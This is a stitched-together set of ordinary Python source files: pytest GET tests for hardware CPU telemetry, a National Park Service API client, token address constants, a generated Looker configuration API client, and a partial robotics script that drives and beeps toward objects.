class TestHardwareCPU(BaseTest):
    """GET-request tests for the hardware CPU telemetry test cases.

    Each test is parametrized with a test-case name from ``hw_cpu.yml``
    plus the ``Hardware`` page-object class, and receives a
    ``create_page_object`` argument built from those parameters.
    NOTE(review): the fixture/parametrization wiring lives in BaseTest or
    conftest -- confirm there how ``create_page_object_arg`` is consumed.
    """

    # YAML file holding the request/validation definition of every case.
    test_case_file = 'hw_cpu.yml'

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_avg',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_avg(self, create_page_object):
        # Dispatch the GET described by the test case, then validate; the
        # case description is the assertion message on failure.  The six
        # tests below follow the same pattern for their respective cases.
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_instant',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_instant(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_interval',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_interval(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_max',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_max(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_max_time',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_max_time(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_min',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_min(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()

    @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
                                                         'test_case_name': 'hw_cpu_min_time',
                                                         'page_object_class': Hardware}])
    def test_hw_cpu_min_time(self, create_page_object):
        create_page_object.execute_get_test_case_with_dispatch()
        assert create_page_object.validate_get_test_case(), create_page_object.get_test_case_description()
| 65.052632
| 106
| 0.628641
| 422
| 3,708
| 4.921801
| 0.092417
| 0.165624
| 0.26962
| 0.107848
| 0.898893
| 0.898893
| 0.898893
| 0.898893
| 0.848339
| 0.771305
| 0
| 0
| 0.294498
| 3,708
| 56
| 107
| 66.214286
| 0.79396
| 0
| 0
| 0.595745
| 0
| 0
| 0.153182
| 0.041532
| 0
| 0
| 0
| 0
| 0.148936
| 1
| 0.148936
| false
| 0
| 0.06383
| 0
| 0.255319
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99659c29885112050104992cd94fb81f49525c41
| 13,010
|
py
|
Python
|
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
nps_client/nationalparks.py
|
yifeitung/nps_client
|
d66b453a03eab2f74d9f3e95f229fe0893b602a7
|
[
"MIT"
] | null | null | null |
import requests
class NPS():
    """
    This is a class for making HTTP requests for National Park Service API.

    Parameters
    ----------
    API_KEY: str
        a string that you get from National Park Service Developer portal.
    """

    def __init__(self, API_KEY):
        # Endpoint paths used below are appended to this base URL.
        self.base_url = "https://developer.nps.gov/api/v1"
        self.API_KEY = API_KEY

    def get_query_params(self, payload=None):
        """
        Generate a set of query parameters to authenticate a request.

        Parameters
        ----------
        payload: dict
            A dictionary that includes query parameters. Must pass apikey
            parameter. The default values include apikey and limit. The
            limit is set to 100.  Fixed: the previous mutable default
            argument ``payload={}`` was shared across calls; a ``None``
            sentinel gives every no-argument call a fresh dict.

        Returns
        -------
        dict
            A dictionary that includes basic query parameters.
        """
        if payload is None:
            payload = {}
        payload['api_key'] = self.API_KEY
        payload['limit'] = 100
        return payload

    def _resolve_start(self, start):
        """
        Validate the pagination ``start`` value shared by the endpoints.

        Returns 0 when start is None, start itself when it is a valid
        non-negative integer, and None (after printing a warning) when
        start is a str, float, or negative number -- the same validation
        the public methods previously duplicated inline.
        """
        if start is None:
            return 0
        try:
            if isinstance(start, (str, float)):
                raise TypeError
            if start < 0:
                raise ValueError
        except (TypeError, ValueError):
            print('Please check your input values for start.')
            return None
        return start

    def _request(self, path, payload):
        """
        Issue an authenticated GET to ``path`` and return the decoded JSON.

        Raises
        ------
        Exception
            If the API responds with a status code other than 200.
        """
        query = self.get_query_params(payload=payload)
        response = requests.get(self.base_url + path, params=query)
        if response.status_code != 200:
            raise Exception("Something went wrong.")
        return response.json()

    def _park_query(self, parkcode, statecode, start, q):
        """
        Build the parkCode/stateCode/start/q payload shared by the park,
        visitor-center and campground endpoints.  Returns None when the
        start value fails validation.
        """
        start = self._resolve_start(start)
        if start is None:
            return None
        payload = {'start': start}
        if parkcode is not None:
            payload['parkCode'] = parkcode
        if statecode is not None:
            payload['stateCode'] = statecode
        if q != "":
            payload['q'] = q
        return payload

    def _topic_query(self, id, q, start):
        """
        Build the id/q/start payload shared by the topic and amenity
        endpoints.  Returns None when the start value fails validation.
        """
        start = self._resolve_start(start)
        if start is None:
            return None
        payload = {'start': start}
        if id != "":
            payload['id'] = id
        if q != "":
            payload['q'] = q
        return payload

    def get_categories_of_activities(self, payload=None):
        """
        Retrieve categories of activities (astronomy, hiking, wildlife
        watching, etc.) possible in national parks.

        Parameters
        ----------
        payload: dict
            A dictionary that includes query parameters. This parameter is
            not necessary, but you could include additional parameters; for
            example, pass q to search for activities.

        Returns
        -------
        dict
        """
        if payload is None:
            payload = {}
        return self._request("/activities", payload)

    def get_park_information(self, parkcode=None, statecode=None,
                             start=None, q=""):
        """
        Retrieve data about national parks (address, contacts, description,
        hours of operation, etc).

        Parameters
        ----------
        parkcode: str
            A comma delimited list of park codes (each 4-10 characters in
            length).
        statecode: str
            A comma delimited list of 2 character state codes.
        start: int
            Get the next 100 results starting with this number. Default
            is 0.
        q: str
            Term to search on.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._park_query(parkcode, statecode, start, q)
        if payload is None:
            return None
        return self._request("/parks", payload)

    def get_vistorcenters(self, parkcode=None, statecode=None,
                          start=None, q=""):
        """
        Retrieve data about National Park Service visitor centers including
        addresses, contacts, description, hours of operation, etc.

        (The typo in the method name is preserved for backward
        compatibility with existing callers.)

        Parameters
        ----------
        parkcode: str
            A comma delimited list of park codes (each 4 characters in
            length).
        statecode: str
            A comma delimited list of 2 character state codes.  Bug fix:
            this was previously sent as the 'statecode' query parameter,
            unlike every sibling endpoint which sends 'stateCode'.
        start: int
            Get the next 100 results starting with this number. Default
            is 0.
        q: str
            Term to search on.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._park_query(parkcode, statecode, start, q)
        if payload is None:
            return None
        return self._request("/visitorcenters", payload)

    def get_campgrounds(self, parkcode=None, statecode=None,
                        start=None, q=""):
        """
        Retrieve data about National Park Service campgrounds including
        addresses, contacts, description, hours of operation, etc.

        Parameters
        ----------
        parkcode: str
            A comma delimited list of park codes (each 4 characters in
            length).
        statecode: str
            A comma delimited list of 2 character state codes.
        start: int
            Get the next 100 results starting with this number. Default
            is 0.  (Validation of ``start`` is now applied here too, for
            consistency with the other endpoints.)
        q: str
            Term to search on.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._park_query(parkcode, statecode, start, q)
        if payload is None:
            return None
        return self._request("/campgrounds", payload)

    def get_categories_of_topics(self, id="", q="", start=None):
        """
        Retrieve categories of topics (American revolution, music, women's
        history, etc.) relating to national parks.

        Parameters
        ----------
        id: str
            Topic ID.
        q: str
            A string to search for.
        start: int
            Get the next 100 results starting with this number. Default is
            0 if you do not specify.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._topic_query(id, q, start)
        if payload is None:
            return None
        return self._request("/topics", payload)

    def get_topics_related_parks(self, id="", q="", start=None):
        """
        Retrieve national parks that are related to particular categories
        of topics (American revolution, music, women's history, etc.)

        Parameters
        ----------
        id: str
            Topic ID.
        q: str
            A string to search for.
        start: int
            Get the next 100 results starting with this number. Default is
            0 if you do not specify.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._topic_query(id, q, start)
        if payload is None:
            return None
        return self._request("/topics/parks", payload)

    def get_amenities_types(self, id="", q="", start=None):
        """
        Retrieve the amenity types (accessible restrooms, fire pit, picnic
        area, etc.) available in national parks.

        Parameters
        ----------
        id: str
            Topic unique ID.
        q: str
            A string to search for.
        start: int
            Get the next 100 results starting with this number. Default is
            0 if you do not specify.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._topic_query(id, q, start)
        if payload is None:
            return None
        return self._request("/amenities", payload)

    def get_amenities_places_within_parks(self, parkcode=None,
                                          id="", q="", start=None):
        """
        Retrieve "places" within national parks that have different
        amenities.

        Parameters
        ----------
        parkcode: str
            4 character park code.
        id: str
            Amenity ID.
        q: str
            A string to search for.
        start: int
            Get the next 100 results starting with this number. Default is
            0 if you do not specify.

        Returns
        -------
        dict
            Decoded JSON response, or None when ``start`` is invalid.
        """
        payload = self._topic_query(id, q, start)
        if payload is None:
            return None
        if parkcode is not None:
            payload['parkCode'] = parkcode
        return self._request("/amenities/parksplaces", payload)
| 31.199041
| 79
| 0.509224
| 1,342
| 13,010
| 4.877049
| 0.134128
| 0.036669
| 0.029794
| 0.035294
| 0.818029
| 0.801375
| 0.783346
| 0.779374
| 0.772651
| 0.747288
| 0
| 0.010345
| 0.398155
| 13,010
| 416
| 80
| 31.274038
| 0.825543
| 0.267948
| 0
| 0.876068
| 0
| 0
| 0.083483
| 0.002635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042735
| false
| 0.047009
| 0.004274
| 0
| 0.115385
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99aa6f7799d0700b5fbdc5882204c8643ea3181b
| 346
|
py
|
Python
|
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
src/constants/coins.py
|
prodesert22/pangolin-chart-api
|
4567f1460ec28c607a969162e66c8d7a4c148fae
|
[
"MIT"
] | null | null | null |
WAVAX = "0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7"
PNG = "0x60781c2586d68229fde47564546784ab3faca982"
WETH = "0x49d5c2bdffac6ce2bfdb6640f4f80f226bc10bab" # WETH.e
DAI = "0xd586e7f844cea2f87f50152665bcbc2c279d8d70" # DAI.e
USDC = "0xa7d7079b0fead91f3e65f86e8915cb59c1a4c664" # USDC.e
USDT = "0xc7198437980c041c805a1edcba50c1ce5db95118" # USDT.e
| 49.428571
| 60
| 0.849711
| 20
| 346
| 14.7
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.48125
| 0.075145
| 346
| 6
| 61
| 57.666667
| 0.4375
| 0.075145
| 0
| 0
| 0
| 0
| 0.8
| 0.8
| 0
| 0
| 0.8
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
852cb8de01ccbd12b51481246c1980ddc6c397df
| 34,963
|
py
|
Python
|
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
looker_client_31/api/config_api.py
|
ContrastingSounds/looker_sdk_31
|
f973434049fff1b605b10086ab8b84f2f62e3489
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from looker_client_31.api_client import ApiClient
class ConfigApi(object):
    """Looker API 3.1 configuration endpoints.

    Originally auto generated by the swagger code generator program
    (https://github.com/swagger-api/swagger-codegen); refactored so the
    per-endpoint boilerplate lives in a single ``_call_endpoint`` helper.

    Every endpoint is synchronous by default.  To get the request thread
    back instead of the decoded response, pass the ``async`` option as a
    keyword.  ``async`` became a reserved word in Python 3.7, so spell it
    ``**{'async': True}`` at the call site.  The original generated code
    passed ``async=...`` literally, which is a SyntaxError on modern
    Pythons; it is now forwarded through a ``**``-expansion.
    """

    # Framework options accepted by every endpoint on top of its own params.
    _LOCAL_OPTIONS = ('async', '_return_http_data_only',
                      '_preload_content', '_request_timeout')

    def __init__(self, api_client=None):
        """Store the injected ApiClient, or build a default one."""
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def _call_endpoint(self, method_name, resource_path, http_method, kwargs,
                       accepted=(), required=(), path_names=(),
                       query_names=(), body_name=None, response_type=None):
        """Shared request plumbing for every endpoint in this class.

        :param method_name: public method name, used in error messages.
        :param resource_path: endpoint path template, e.g. ``'/versions'``.
        :param http_method: HTTP verb ('GET', 'PUT', 'PATCH', ...).
        :param kwargs: caller arguments (endpoint params + framework options).
        :param accepted: endpoint-specific parameter names that are allowed.
        :param required: names that must be present and not None.
        :param path_names: names substituted into the path template.
        :param query_names: names sent as query-string parameters.
        :param body_name: key in ``kwargs`` holding the request body, if any.
        :param response_type: swagger type the response is deserialized to.
        :return: whatever ``ApiClient.call_api`` returns.
        :raises TypeError: on an unexpected keyword argument.
        :raises ValueError: when a required parameter is missing or None.
        """
        params = {}
        for key, val in kwargs.items():
            if key not in accepted and key not in self._LOCAL_OPTIONS:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name))
            params[key] = val
        for name in required:
            # Treat both "missing" and "explicitly None" as absent.
            if params.get(name) is None:
                raise ValueError(
                    "Missing the required parameter `%s` when calling "
                    "`%s`" % (name, method_name))
        path_params = dict((name, params[name])
                           for name in path_names if name in params)
        query_params = [(name, params[name])
                        for name in query_names if name in params]
        header_params = {
            'Accept': self.api_client.select_header_accept(
                ['application/json']),
            'Content-Type': self.api_client.select_header_content_type(
                ['application/json']),
        }
        # 'async' is a reserved word on Python 3.7+, so it can only be
        # forwarded via **-expansion, never as a literal keyword argument.
        return self.api_client.call_api(
            resource_path, http_method,
            path_params,
            query_params,
            header_params,
            body=params.get(body_name) if body_name else None,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=[],
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats={},
            **{'async': params.get('async')})

    def all_legacy_features(self, **kwargs):  # noqa: E501
        """Get All Legacy Features.

        ### Get all legacy features.

        Synchronous by default; pass ``**{'async': True}`` to receive the
        request thread instead.

        :return: list[LegacyFeature]
        """
        kwargs['_return_http_data_only'] = True
        return self.all_legacy_features_with_http_info(**kwargs)

    def all_legacy_features_with_http_info(self, **kwargs):  # noqa: E501
        """Get All Legacy Features, with full HTTP response info.

        :return: list[LegacyFeature]
        """
        return self._call_endpoint(
            'all_legacy_features', '/legacy_features', 'GET', kwargs,
            response_type='list[LegacyFeature]')

    def all_timezones(self, **kwargs):  # noqa: E501
        """Get All Timezones.

        ### Get a list of timezones that Looker supports
        (e.g. useful for scheduling tasks).

        :return: list[Timezone]
        """
        kwargs['_return_http_data_only'] = True
        return self.all_timezones_with_http_info(**kwargs)

    def all_timezones_with_http_info(self, **kwargs):  # noqa: E501
        """Get All Timezones, with full HTTP response info.

        :return: list[Timezone]
        """
        return self._call_endpoint(
            'all_timezones', '/timezones', 'GET', kwargs,
            response_type='list[Timezone]')

    def backup_configuration(self, **kwargs):  # noqa: E501
        """Get Backup Configuration.

        ### Get the current Looker internal database backup configuration.

        :return: BackupConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.backup_configuration_with_http_info(**kwargs)

    def backup_configuration_with_http_info(self, **kwargs):  # noqa: E501
        """Get Backup Configuration, with full HTTP response info.

        :return: BackupConfiguration
        """
        return self._call_endpoint(
            'backup_configuration', '/backup_configuration', 'GET', kwargs,
            response_type='BackupConfiguration')

    def legacy_feature(self, legacy_feature_id, **kwargs):  # noqa: E501
        """Get Legacy Feature.

        ### Get information about the legacy feature with a specific id.

        :param int legacy_feature_id: id of legacy feature (required)
        :return: LegacyFeature
        """
        kwargs['_return_http_data_only'] = True
        return self.legacy_feature_with_http_info(legacy_feature_id, **kwargs)

    def legacy_feature_with_http_info(self, legacy_feature_id, **kwargs):  # noqa: E501
        """Get Legacy Feature, with full HTTP response info.

        :param int legacy_feature_id: id of legacy feature (required)
        :return: LegacyFeature
        """
        kwargs['legacy_feature_id'] = legacy_feature_id
        return self._call_endpoint(
            'legacy_feature', '/legacy_features/{legacy_feature_id}', 'GET',
            kwargs,
            accepted=('legacy_feature_id',),
            required=('legacy_feature_id',),
            path_names=('legacy_feature_id',),
            response_type='LegacyFeature')

    def update_backup_configuration(self, body, **kwargs):  # noqa: E501
        """Update Backup Configuration.

        ### Update the Looker internal database backup configuration.

        :param BackupConfiguration body: Options for Backup Configuration (required)
        :return: BackupConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.update_backup_configuration_with_http_info(body, **kwargs)

    def update_backup_configuration_with_http_info(self, body, **kwargs):  # noqa: E501
        """Update Backup Configuration, with full HTTP response info.

        :param BackupConfiguration body: Options for Backup Configuration (required)
        :return: BackupConfiguration
        """
        kwargs['body'] = body
        return self._call_endpoint(
            'update_backup_configuration', '/backup_configuration', 'PATCH',
            kwargs,
            accepted=('body',),
            required=('body',),
            body_name='body',
            response_type='BackupConfiguration')

    def update_legacy_feature(self, legacy_feature_id, body, **kwargs):  # noqa: E501
        """Update Legacy Feature.

        ### Update information about the legacy feature with a specific id.

        :param int legacy_feature_id: id of legacy feature (required)
        :param LegacyFeature body: Legacy Feature (required)
        :return: LegacyFeature
        """
        kwargs['_return_http_data_only'] = True
        return self.update_legacy_feature_with_http_info(
            legacy_feature_id, body, **kwargs)

    def update_legacy_feature_with_http_info(self, legacy_feature_id, body, **kwargs):  # noqa: E501
        """Update Legacy Feature, with full HTTP response info.

        :param int legacy_feature_id: id of legacy feature (required)
        :param LegacyFeature body: Legacy Feature (required)
        :return: LegacyFeature
        """
        kwargs['legacy_feature_id'] = legacy_feature_id
        kwargs['body'] = body
        return self._call_endpoint(
            'update_legacy_feature',
            '/legacy_features/{legacy_feature_id}', 'PATCH', kwargs,
            accepted=('legacy_feature_id', 'body'),
            required=('legacy_feature_id', 'body'),
            path_names=('legacy_feature_id',),
            body_name='body',
            response_type='LegacyFeature')

    def update_whitelabel_configuration(self, body, **kwargs):  # noqa: E501
        """Update Whitelabel configuration.

        ### Update the whitelabel configuration

        :param WhitelabelConfiguration body: Whitelabel configuration (required)
        :return: WhitelabelConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.update_whitelabel_configuration_with_http_info(
            body, **kwargs)

    def update_whitelabel_configuration_with_http_info(self, body, **kwargs):  # noqa: E501
        """Update Whitelabel configuration, with full HTTP response info.

        :param WhitelabelConfiguration body: Whitelabel configuration (required)
        :return: WhitelabelConfiguration
        """
        kwargs['body'] = body
        return self._call_endpoint(
            'update_whitelabel_configuration', '/whitelabel_configuration',
            'PUT', kwargs,
            accepted=('body',),
            required=('body',),
            body_name='body',
            response_type='WhitelabelConfiguration')

    def versions(self, **kwargs):  # noqa: E501
        """Get ApiVersion.

        ### Get information about all API versions supported by this
        Looker instance.

        :param str fields: Requested fields.
        :return: ApiVersion
        """
        kwargs['_return_http_data_only'] = True
        return self.versions_with_http_info(**kwargs)

    def versions_with_http_info(self, **kwargs):  # noqa: E501
        """Get ApiVersion, with full HTTP response info.

        :param str fields: Requested fields.
        :return: ApiVersion
        """
        return self._call_endpoint(
            'versions', '/versions', 'GET', kwargs,
            accepted=('fields',),
            query_names=('fields',),
            response_type='ApiVersion')

    def whitelabel_configuration(self, **kwargs):  # noqa: E501
        """Get Whitelabel configuration.

        ### This feature is enabled only by special license.
        ### Gets the whitelabel configuration, which includes hiding
        documentation links, custom favicon uploading, etc.

        :param str fields: Requested fields.
        :return: WhitelabelConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.whitelabel_configuration_with_http_info(**kwargs)

    def whitelabel_configuration_with_http_info(self, **kwargs):  # noqa: E501
        """Get Whitelabel configuration, with full HTTP response info.

        :param str fields: Requested fields.
        :return: WhitelabelConfiguration
        """
        return self._call_endpoint(
            'whitelabel_configuration', '/whitelabel_configuration', 'GET',
            kwargs,
            accepted=('fields',),
            query_names=('fields',),
            response_type='WhitelabelConfiguration')
| 38.761641
| 518
| 0.610846
| 3,856
| 34,963
| 5.304461
| 0.060944
| 0.053193
| 0.024641
| 0.031681
| 0.953065
| 0.951843
| 0.946025
| 0.939718
| 0.936443
| 0.922607
| 0
| 0.017626
| 0.300604
| 34,963
| 901
| 519
| 38.804661
| 0.818836
| 0.058405
| 0
| 0.82881
| 0
| 0
| 0.170304
| 0.04815
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008351
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5184d0161aea91229d845f24bc5e40026756eea2
| 6,396
|
py
|
Python
|
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
src/m2_extra.py
|
brutchjd/99-CapstoneProject-201920
|
1208252bab3aeb95fca0529f3f983854ac9efd89
|
[
"MIT"
] | null | null | null |
"""
Capstone Project. Code to call functions for sprint 3.
Authors: Your professors (for the framework)
and Nathaniel Craan
Winter term, 2018-2019.
"""
import rosebot
import time
#import tkinter
#from tkinter import ttk
#import m2_run_this_on_laptop as m2L
def m2_pickup_beep(rate):
    """Drive until right next to the object, beeping at a pace scaled by
    ``rate``, then raise the arm to pick it up.
    """
    bot = rosebot.RoseBot()
    go_until_distance_is_within_beep(bot, 2, 0, 25, rate)
    bot.arm_and_claw.raise_arm()
def m2_camera_clockwise(speed, area):
    """Spin clockwise until the camera reports an object (per
    ``spin_clockwise_until_sees_object``), keep turning on the right
    motor until the blob's x-center falls strictly between 150 and 200,
    then stop and pick the object up via ``m2_pickup_beep``.
    """
    bot = rosebot.RoseBot()
    bot.drive_system.spin_clockwise_until_sees_object(speed, area)
    bot.drive_system.right_motor.turn_on(speed)
    centered = False
    while not centered:
        blob_x = bot.sensor_system.camera.get_biggest_blob().center.x
        centered = 150 < blob_x < 200
    bot.drive_system.right_motor.turn_off()
    m2_pickup_beep(10)
def m2_camera_counterclockwise(speed, area):
    """Mirror of ``m2_camera_clockwise``: spin counterclockwise until the
    camera reports an object, keep the left motor on until the blob's
    x-center falls strictly between 150 and 200, stop, then pick the
    object up via ``m2_pickup_beep``.
    """
    bot = rosebot.RoseBot()
    bot.drive_system.spin_counterclockwise_until_sees_object(speed, area)
    bot.drive_system.left_motor.turn_on(speed)
    centered = False
    while not centered:
        blob_x = bot.sensor_system.camera.get_biggest_blob().center.x
        centered = 150 < blob_x < 200
    bot.drive_system.left_motor.turn_off()
    m2_pickup_beep(10)
def go_until_distance_is_within_beep(robot, delta, inches, speed, rate):
    """Drive forward or backward until the IR proximity sensor reads
    within ``delta`` inches of ``inches``, beeping faster as the robot
    closes in, then stop both motors.

    :param robot:  rosebot.RoseBot instance to drive.
    :param delta:  tolerance (inches) around the target distance.
    :param inches: target distance from the object, in inches.
    :param speed:  wheel speed while driving.
    :param rate:   scales the beep pace (interval = 1 / (rate * distance)).
    """
    start = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
    print(start)
    # NOTE(review): when start is already inside the tolerance band, the
    # second branch still fires and briefly backs the robot up -- behavior
    # preserved from the original; confirm whether that is intended.
    if start > inches + delta:
        robot.drive_system.go(speed, speed)
        _beep_until_within(robot, delta, inches, rate)
    if start < inches + delta:
        robot.drive_system.go(-1 * speed, -1 * speed)
        _beep_until_within(robot, delta, inches, rate)


def _beep_until_within(robot, delta, inches, rate):
    """Beep (faster as the distance shrinks) until the IR reading is
    within ``delta`` of ``inches``, then turn both motors off.
    """
    while True:
        # One sensor read per pass (the original redundantly read the
        # sensor twice per iteration into `test` and `distance`).
        reading = robot.sensor_system.ir_proximity_sensor.get_distance_in_inches()
        robot.sound_system.beeper.beep()
        # Epsilon avoids a ZeroDivisionError when the reading is 0.
        time.sleep(1 / (rate * (reading + 0.00001)))
        print(reading)
        if (inches - delta) <= reading <= (inches + delta):
            print(reading)
            robot.drive_system.left_motor.turn_off()
            robot.drive_system.right_motor.turn_off()
            break
def map_rectangle(speed, width, length, loops):
    """Wait until the color sensor sees blue, approach and pick up the
    object, then trace a ``width`` x ``length`` rectangle ``loops`` times.

    :param speed:  wheel speed for straights and turns.
    :param width:  rectangle width, in inches.
    :param length: rectangle length, in inches.
    :param loops:  how many full rectangles to trace.
    """
    robot = rosebot.RoseBot()
    while True:
        if (robot.sensor_system.color_sensor.get_color_as_name() == 'Blue'
                or robot.sensor_system.color_sensor.get_color() == 2):
            robot.drive_system.go_until_distance_is_within(2, 0, 25)
            robot.arm_and_claw.raise_arm()
            for _ in range(loops):
                # Two (length, turn, width, turn) passes = one rectangle.
                for _pass in range(2):
                    robot.drive_system.go_straight_for_inches_using_encoder(
                        length, speed)
                    _pivot_in_place(robot, speed, 0.75)
                    robot.drive_system.go_straight_for_inches_using_encoder(
                        width, speed)
                    _pivot_in_place(robot, speed, 0.75)
            break


def _pivot_in_place(robot, speed, seconds):
    """Spin in place (left wheel forward, right wheel backward) for the
    given number of seconds, then stop.  The turn angle is time-based, so
    it depends on speed and battery level.
    """
    robot.drive_system.left_motor.turn_on(speed)
    robot.drive_system.right_motor.turn_on(-1 * speed)
    start = time.time()
    while time.time() - start < seconds:
        pass
    robot.drive_system.left_motor.turn_off()
    robot.drive_system.right_motor.turn_off()
def map_triangle(speed, length, loops):
    """Wait until the color sensor sees blue, approach and pick up the
    object, then repeat ``loops`` times: drive ``length`` inches and make
    a timed in-place turn, twice per loop.

    NOTE(review): only two side/turn passes happen per loop even though
    the name says triangle -- preserved exactly as written; confirm
    range(2) vs range(3) with the author.
    """
    bot = rosebot.RoseBot()
    while True:
        if (bot.sensor_system.color_sensor.get_color_as_name() == 'Blue'
                or bot.sensor_system.color_sensor.get_color() == 2):
            bot.drive_system.go_until_distance_is_within(2, 0, 25)
            bot.arm_and_claw.raise_arm()
            for _ in range(loops):
                for _side in range(2):
                    bot.drive_system.go_straight_for_inches_using_encoder(
                        length, speed)
                    # Timed in-place turn: spin wheels opposite ways for 1 s.
                    bot.drive_system.left_motor.turn_on(speed)
                    bot.drive_system.right_motor.turn_on(-1 * speed)
                    turn_started = time.time()
                    while time.time() - turn_started < 1:
                        pass
                    bot.drive_system.left_motor.turn_off()
                    bot.drive_system.right_motor.turn_off()
            break
def map_circle(speed, length, loops, duration):
    """Drive straight segments with timed pivots after a blue trigger.

    :param speed:    motor duty used for driving and pivoting.
    :param length:   segment length in inches.
